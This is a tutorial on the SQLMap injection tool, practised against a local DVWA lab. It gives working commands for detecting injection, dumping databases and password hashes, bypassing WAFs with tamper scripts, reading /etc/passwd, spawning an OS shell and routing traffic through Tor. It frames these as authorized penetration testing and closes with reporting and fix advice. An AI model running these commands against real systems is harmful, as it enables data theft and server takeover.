SQL injection remains one of the most prevalent vulnerabilities in web applications, consistently sitting on the OWASP Top 10. SQLMap is the industry-standard open-source tool for detecting and exploiting SQL injection flaws automatically. It handles everything from fingerprinting the database engine to dumping tables, extracting password hashes, and even spawning an OS-level shell — all with a single command line.
This guide covers SQLMap from first scan through full database compromise, using DVWA (Damn Vulnerable Web Application) as the practice target.
Ethical reminder: Use SQLMap only on applications you own or have written authorization to test. Unauthorized testing violates computer fraud laws worldwide.
Installation and Requirements
SQLMap is pre-installed on Kali Linux and Parrot OS. Verify the version:
sqlmap --version
# 1.8.6#stable
Install on any system with Python 3:
git clone https://github.com/sqlmapproject/sqlmap.git
cd sqlmap
python3 sqlmap.py --version
Setting Up a Practice Target
The safest way to practice is against DVWA running in Docker:
docker run -d -p 8080:80 vulnerables/web-dvwa
Navigate to http://localhost:8080, log in with admin / password, and set the security level to Low in the DVWA Security tab. The SQL Injection page at /dvwa/vulnerabilities/sqli/ is your target.
Basic Scanning
Testing a GET Parameter
The simplest SQLMap invocation tests a URL with a GET parameter. Grab the URL from your browser while testing the DVWA SQL injection page:
sqlmap -u "http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
--cookie="PHPSESSID=abc123; security=low"
SQLMap will run a battery of payloads and report vulnerable parameters:
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 5574=5574&Submit=Submit
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1 AND SLEEP(5)&Submit=Submit
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT NULL,NULL,CONCAT(...)-- -
Testing a POST Parameter
For login forms or search boxes that use POST requests, capture the request with Burp Suite, save it as a file, and pass it to SQLMap:
sqlmap -r /tmp/request.txt -p username
Where request.txt contains the raw HTTP request:
POST /login HTTP/1.1
Host: target.example.com
Content-Type: application/x-www-form-urlencoded
username=admin&password=test&submit=Login
Enumerating the Database
Once a vulnerability is confirmed, enumerate the database structure step by step.
List Databases
sqlmap -u "http://localhost:8080/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" \
--cookie="PHPSESSID=abc123; security=low" --dbs
Output:
available databases [2]:
[*] dvwa
[*] information_schema
List Tables in a Database
sqlmap -u "..." --cookie="..." -D dvwa --tables
Database: dvwa
[2 tables]
+----------+
| guestbook|
| users |
+----------+
Dump a Table
sqlmap -u "..." --cookie="..." -D dvwa -T users --dump
SQLMap will extract all columns and rows, automatically recognizing and attempting to crack any password hashes it finds:
+----+----------+----------------------------------+
| id | user | password |
+----+----------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2 | gordonb | e99a18c428cb38d5f260853678922e03 |
+----+----------+----------------------------------+
It will offer to crack hashes using a dictionary attack on the spot.
Advanced SQLMap Techniques
Specifying the DBMS
If you already know the database engine (speeds up scanning dramatically):
sqlmap -u "..." --dbms=mysql
Common options: mysql, mssql, oracle, postgresql, sqlite
Tamper Scripts
Web application firewalls (WAFs) and filters can block standard payloads. SQLMap’s tamper scripts obfuscate payloads to bypass common defenses:
sqlmap -u "..." --tamper=space2comment,between,randomcase
| Tamper Script | What It Does |
|---|
space2comment | Replaces spaces with /**/ |
between | Replaces > with NOT BETWEEN 0 AND |
randomcase | Randomizes payload letter case |
charencode | URL-encodes characters |
base64encode | Base64-encodes the entire payload |
apostrophemask | Replaces apostrophes with UTF-8 full-width equivalents |
Stack multiple tampers with commas. For heavy WAF bypass, combine charencode, randomcase, and space2comment together.
Setting the Risk and Level
By default SQLMap uses --level=1 --risk=1 (safe, conservative). Increase these on confirmed-vulnerable targets:
sqlmap -u "..." --level=5 --risk=3
- Level 1–5: How many test payloads to try (headers, cookies, etc.)
- Risk 1–3: How aggressive to be (risk=3 includes heavy time-based payloads that can crash DBs)
Threading
Speed up large scans with threading (default is 1):
sqlmap -u "..." --threads=10
Operating System Interaction
On misconfigured MySQL servers with FILE privileges, SQLMap can read files:
sqlmap -u "..." --file-read="/etc/passwd"
On MSSQL with xp_cmdshell enabled, or MySQL with INTO OUTFILE access, SQLMap can attempt to write files or execute OS commands:
sqlmap -u "..." --os-shell
This drops into an interactive shell on the database server — a critical finding to include in any pentest report.
Saving and Resuming Sessions
For long-running tests, SQLMap automatically saves sessions. Resume a previous scan with:
sqlmap -u "..." --resume
Or specify a custom session directory:
sqlmap -u "..." --output-dir=/tmp/sqlmap-sessions
Practical Flags Reference
| Flag | Purpose |
|---|
-u URL | Target URL |
-r FILE | Load raw HTTP request from file |
-p PARAM | Test specific parameter |
--dbs | Enumerate databases |
-D DB --tables | List tables in database |
-D DB -T TABLE --dump | Dump table contents |
--batch | Non-interactive mode (auto-answer prompts) |
--forms | Auto-detect and test HTML forms |
--crawl=DEPTH | Spider the app before testing |
--proxy=http://127.0.0.1:8080 | Route through Burp Suite |
--tor | Route through Tor network |
--random-agent | Randomize User-Agent header |
--flush-session | Clear cached session data |
Reporting Findings
When writing up SQL injection findings, document:
- Vulnerable parameter and URL
- Injection type (Union-based, blind boolean, time-based, error-based)
- Database engine and version (SQLMap reports this automatically)
- Data accessed (list tables/records exposed — do NOT dump real PII in a report)
- Potential impact (data exfiltration, authentication bypass, OS command execution)
- Recommended fix (parameterized queries / prepared statements)
SQLMap is an indispensable tool for web application assessments, but it’s only as good as the tester interpreting its output. Understanding why an injection works helps you write better reports and give more actionable remediation advice.